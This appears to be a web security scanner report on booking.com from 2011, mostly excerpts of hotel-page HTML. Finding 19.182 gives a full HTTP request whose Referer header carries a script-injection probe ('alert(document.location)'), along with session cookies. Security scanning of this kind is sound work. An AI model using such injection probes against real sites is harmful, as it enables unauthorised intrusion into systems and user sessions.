...[SNIP]...
<div class="blocktoggle" id="blocktoggleRD5625505">


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685107.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685107.jpg' /><br /><strong>Queen Room</strong>"

alt="Copley Square Hotel: Queen Room"

/>

<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685102.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685102.jpg' /><br /><strong>Queen Room</strong>"

alt="Copley Square Hotel: Queen Room"

/>


<p>
...[SNIP]...
</strong>">
<img src="http://r.bstatic.com/images/hotel/square90/435/4354427.jpg" width="60" height="60" alt="Premier Double Room with Two Double Beds"/><img src="http://q.bstatic.com/static/img/icons/imgplus.gif" alt="" style="position:absolute; top:47px; left:47px;" />


<a href="#RD5625501" class="togglelink jqrt " title="">
...[SNIP]...
<div class="roomDefaultUse">


<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max4 jq_tooltip" width="43" height="10" title="Max people: 4" alt="" />


</div>
...[SNIP]...
<div class="blocktoggle" id="blocktoggleRD5625501">


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/435/4354427.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/435/4354427.jpg' /><br /><strong>Premier Double Room with Two Double Beds</strong>"

alt="Copley Square Hotel: Premier Double Room with Two Double Beds"

/>

<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685107.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685107.jpg' /><br /><strong>Premier Double Room with Two Double Beds</strong>"

alt="Copley Square Hotel: Premier Double Room with Two Double Beds"

/>


<p>
...[SNIP]...
</strong>">
<img src="http://q.bstatic.com/images/hotel/square90/435/4354432.jpg" width="60" height="60" alt="Copley Square Suite"/><img src="http://q.bstatic.com/static/img/icons/imgplus.gif" alt="" style="position:absolute; top:47px; left:47px;" />


<a href="#RD5625508" class="togglelink jqrt " title="">
...[SNIP]...
<div class="roomDefaultUse">


<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />


</div>
...[SNIP]...
<div class="blocktoggle" id="blocktoggleRD5625508">


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://q.bstatic.com/images/hotel/square90/435/4354432.jpg"
title="<img src='http://q.bstatic.com/images/hotel/max300/435/4354432.jpg' /><br /><strong>Copley Square Suite</strong>"

alt="Copley Square Hotel: Copley Square Suite"

/>


<p>
...[SNIP]...
</strong>">
<img src="http://r.bstatic.com/images/hotel/square90/168/1685101.jpg" width="60" height="60" alt=""/><img src="http://q.bstatic.com/static/img/icons/imgplus.gif" alt="" style="position:absolute; top:47px; left:47px;" />


<a href="#RD5625504sor" class="togglelink jqrt" title="">
...[SNIP]...
<div class="roomDefaultUse">

<img src="http://s.bstatic.com/static/img/transparent.png"
class="occsprite max2 jq_tooltip"
width="43"
height="10"


title="Standard occupancy: 2"

alt=""
/>

</div>
...[SNIP]...
<div class="blocktoggle" id="blocktoggleRD5625504sor">


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685101.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685101.jpg' /><br /><strong></strong>"

alt="Copley Square Hotel: "

/>


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685107.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685107.jpg' /><br /><strong></strong>"

alt="Copley Square Hotel: "

/>


<p>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>General
</span>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Activities
</span>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Services
</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""

/>Internet</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""

/>Parking</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Check in</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Check out</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Cancellation / Prepayment</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Children and extra beds</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/> Pets</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Accepted credit cards</span>
...[SNIP]...
<a title="Ready to book? Choose a room." id="top_link" href="#availability_target" onclick="blockdisplay(1);"><img src="http://s.bstatic.com/static/img/transparent.png"
alt="Ready to book? Choose a room."
title="Go to the top of the page"
class="use_sprites icon_top"
/>


Choose a room.


</a>
...[SNIP]...
<div style="text-align:center;padding:3em;"><img src="http://r.bstatic.com/static/img/loading_filterbox.gif" alt="loading..." /></div>
...[SNIP]...
<a title="Ready to book? Choose a room." id="top_link" href="#availability_target" onclick="blockdisplay(1);"><img src="http://s.bstatic.com/static/img/transparent.png"
alt="Ready to book? Choose a room."
title="Go to the top of the page"
class="use_sprites icon_top"
/>


Choose a room.


</a>
...[SNIP]...
</strong>"
href="/hotel/us/the-liberty.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
>

<img class="hotelImg" src="http://q.bstatic.com/images/hotel/square60/191/1916558.jpg" width="60" height="60" title="The Liberty Hotel, A Luxury Collection Hotel" alt="hotel" align="left" />
</a>
...[SNIP]...
</strong>"
href="/hotel/us/westin-copley-place.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
>

<img class="hotelImg" src="http://r.bstatic.com/images/hotel/square60/131/1314320.jpg" width="60" height="60" title="Westin Copley Place" alt="hotel" align="left" />
</a>
...[SNIP]...
</strong>"
href="/hotel/us/harborside.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
>

<img class="hotelImg" src="http://s.bstatic.com/images/hotel/square60/577/577726.jpg" width="60" height="60" title="Harborside Inn" alt="hotel" align="left" />
</a>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="25"
height="17"
alt=""
title="previous hotel"
/>previous hotel
</span>
...[SNIP]...
<a
href="/hotel/us/the-liberty.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
><img
src="http://s.bstatic.com/static/img/transparent.png"
width="25"
height="17"
alt=""
title="next hotel"
/>next hotel</a>
...[SNIP]...
</span>
<a id="share_popup_fb" class="fb_share" rel="250 nofollow" target="_blank" href="http://www.facebook.com/share.php?u=http://www.booking.com/hotel/us/copley-square.html?label=socnet_fb_h_shp&aid=339528" title="Share a link to this hotel page on Facebook" name="on Facebook"><img class="share_popup_img use_sprites icon_social_media_fb" src="http://s.bstatic.com/static/img/transparent.png" /></a>
<a rel="250 nofollow" id="share_popup_t" class="share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Check out this hotel! Copley Square Hotel" id="t" title="Share a link to this hotel page on Twitter" data-shorturl="http://www.booking.com/hotel/us/copley-square.html?label=socnet_t_h&aid=339529" name="on Twitter"><img class="share_popup_img use_sprites icon_social_media_twitter" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
3D339530;title=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com;notes=Check out Copley%20Square%20Hotel on Booking.com for: Best Price Guaranteed, 49 Guest reviews, No booking fees"><img class="share_popup_img use_sprites icon_social_media_mailafriend" src="http://s.bstatic.com/static/img/transparent.png" /></a>
</span>

<div id="share_popup_close"><img class="share_popup_img use_sprites icon_share_popup_close" src="http://s.bstatic.com/static/img/transparent.png" /></div>
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<img src="http://s.bstatic.com/static/img/marker-hotel-blue.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-hotel-grey.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport-large.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-city.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/hotel.1191.js"></script>
...[SNIP]...
19.182. http://www.booking.com/index.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/index.en.html" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<!--[if lte IE 8]>
...[SNIP]...
</style>


<link rel="stylesheet" type="text/css" href="http://r.bstatic.com/static/css/landingpage.1191.css" />


<title>
...[SNIP]...
<div id="top" class="">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel now!" />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


<style>
...[SNIP]...
<div id="homein" style="padding-right:1.3em;">

<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<div id="homeout">
<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/san-diego.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20015725" style="text-decoration: none !important;">
<img src="http://q.bstatic.com/static/img/city/20015725/100x100.jpg" align="left" alt="San Diego U.S.A. Hotels" title="Hotels in San Diego, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/san-diego.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20015725"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/fr/paris.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-1456928" style="text-decoration: none !important;">
<img src="http://q.bstatic.com/static/img/city/-1456928/100x100.jpg" align="left" alt="Paris France Hotels" title="Hotels in Paris, France" width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/fr/paris.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-1456928"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/los-angeles.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20014181" style="text-decoration: none !important;">
<img src="http://s.bstatic.com/static/img/city/20014181/100x100.jpg" align="left" alt="Los Angeles U.S.A. Hotels" title="Hotels in Los Angeles, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/los-angeles.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20014181"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/it/rome.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-126693" style="text-decoration: none !important;">
<img src="http://s.bstatic.com/static/img/city/-126693/100x100.jpg" align="left" alt="Rome Italy Hotels" title="Hotels in Rome, Italy" width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/it/rome.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-126693"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/washington.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20021296" style="text-decoration: none !important;">
<img src="http://s.bstatic.com/static/img/city/20021296/100x100.jpg" align="left" alt="Washington U.S.A. Hotels" title="Hotels in Washington, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/washington.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20021296"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/orlando.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20023488" style="text-decoration: none !important;">
<img src="http://r.bstatic.com/static/img/city/20023488/100x100.jpg" align="left" alt="Orlando U.S.A. Hotels" title="Hotels in Orlando, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/orlando.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20023488"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/gb/london.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-2601889" style="text-decoration: none !important;">
<img src="http://q.bstatic.com/static/img/city/-2601889/100x100.jpg" align="left" alt="London United Kingdom Hotels" title="Hotels in London, United Kingdom" width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/gb/london.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=-2601889"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<a class="thumblink" href="/city/us/boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20061717" style="text-decoration: none !important;">
<img src="http://r.bstatic.com/static/img/city/20061717/100x100.jpg" align="left" alt="Boston U.S.A. Hotels" title="Hotels in Boston, U.S.A." width="100" height="100" />
</a>
...[SNIP]...
<a href="/city/us/boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;city=20061717"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</h3>

<img id="trans_map" src="http://s.bstatic.com/static/img/trans30.gif" alt="worldmap" usemap="#world_map" width="445" height="214"/>
<map id="world_map" name="world_map">
...[SNIP]...
<h2 style="padding-right:120px; margin:0; line-height: 160%;">Save 50% or more with Flash Deals&nbsp;<img id="newsHelp" src="http://r.bstatic.com/static/img/info.png" alt="" class="jq_tooltip" rel="300" title="Subscribe to get selected hotels at half price or less." style="cursor: help;" /></h2>
...[SNIP]...
<h3>Booking.com is a <a href="http://www.priceline.com/">Priceline</a>
...[SNIP]...
<p><a href="http://www.priceline.com/"><img src="http://s.bstatic.com/static/img/experiments/priceline-usp.gif" alt="" /></a>
...[SNIP]...
<span class="number_reviews">From <a href="http://www.reviewcentre.com/reviews-all-195173.html" target="_blank">1710 reviews</a>
...[SNIP]...
rmal; text-decoration: none; font-size: 1.5em;"
href="/hotel/us/c-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
class="hotel_history_lnk">

<img

style="display: block; border: 5px solid white !important; margin-right: 10px; margin-bottom: 10px"

class="thumb jq_tooltippex"
src="http://r.bstatic.com/images/hotel/square60/127/1278290.jpg"
width="60"
height="60"
title="&lt;img src='http://s.bstatic.com/images/hotel/max300/127/1278290.jpg' /&gt;&lt;br&gt;&lt;strong&gt;Hotel Commonwealth&lt;/strong&gt;"
alt="hotel Hotel Commonwealth"
/>Hotel Commonwealth</a>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;We very much enjoyed our stay. Liked the location to ballpark, and other things. Rooms were excellent, specially like the size of our bathroom. Staff was very helpfull, and nice. We would stay again it was that enjoyable. Thank you ! Rena&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Rena, Bangor, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<span class="vhsoldout" style="font-size: .88em">
<img src="http://s.bstatic.com/static/img/icons/warning.gif" alt="Sold out!" />
<strong>
...[SNIP]...
<a href="/hotel/us/c-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
weight: normal; text-decoration: none; font-size: 1.5em;"
href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
class="hotel_history_lnk">

<img

style="display: block; border: 5px solid white !important; margin-right: 10px; margin-bottom: 10px"

class="thumb jq_tooltippex"
src="http://q.bstatic.com/images/hotel/square60/169/1691256.jpg"
width="60"
height="60"
title="&lt;img src='http://r.bstatic.com/images/hotel/max300/169/1691256.jpg' /&gt;&lt;br&gt;&lt;strong&gt;Copley Square Hotel&lt;/strong&gt;"
alt="hotel Copley Square Hotel"
/>Copley Square Hotel</a>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Attractively appointed, efficient, professional and well-located.

&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Douglas, Harrison, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<span class="vhsoldout" style="font-size: .88em">
<img src="http://s.bstatic.com/static/img/icons/warning.gif" alt="Sold out!" />
<strong>
...[SNIP]...
<a href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</p>


<a id="share_hotel_history_fb" target="_blank" class="share_hotel_history_link jq_tooltip" href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Fss%3Did%3A59554%2C56255%26si%3Dho%26label%3Dsocnet_fb_hh_sh%26aid%3D339528" title="Share these hotels on Facebook." name="Share these hotels on Facebook."><img id="share_hotel_history_fb_img" class="use_sprites icon_social_media_fb" src="http://s.bstatic.com/static/img/transparent.png" /></a>

<a id="share_hotel_history_t" class="share_hotel_history_link jq_tooltip share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Help! Which hotel is best?" title="Share these hotels on Twitter." data-shorturl="http://www.booking.com/searchresults.html?ss=id:59554,56255&si=ho&label=socnet_t_hh_sh&aid=339529" name="Share these hotels on Twitter."><img id="share_hotel_history_t_img" class="use_sprites icon_social_media_twitter" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
ca101;tmpl=mailafriend_standalone;url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Fss%3Did%3A59554%2C56255%26si%3Dho%3Blabel%3Dsocnet_maf_hh_sh%3Baid%3D339530;title=Booking.com: Welcome;notes="><img class="use_sprites icon_social_media_mailafriend" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
<td class="c1thumb">


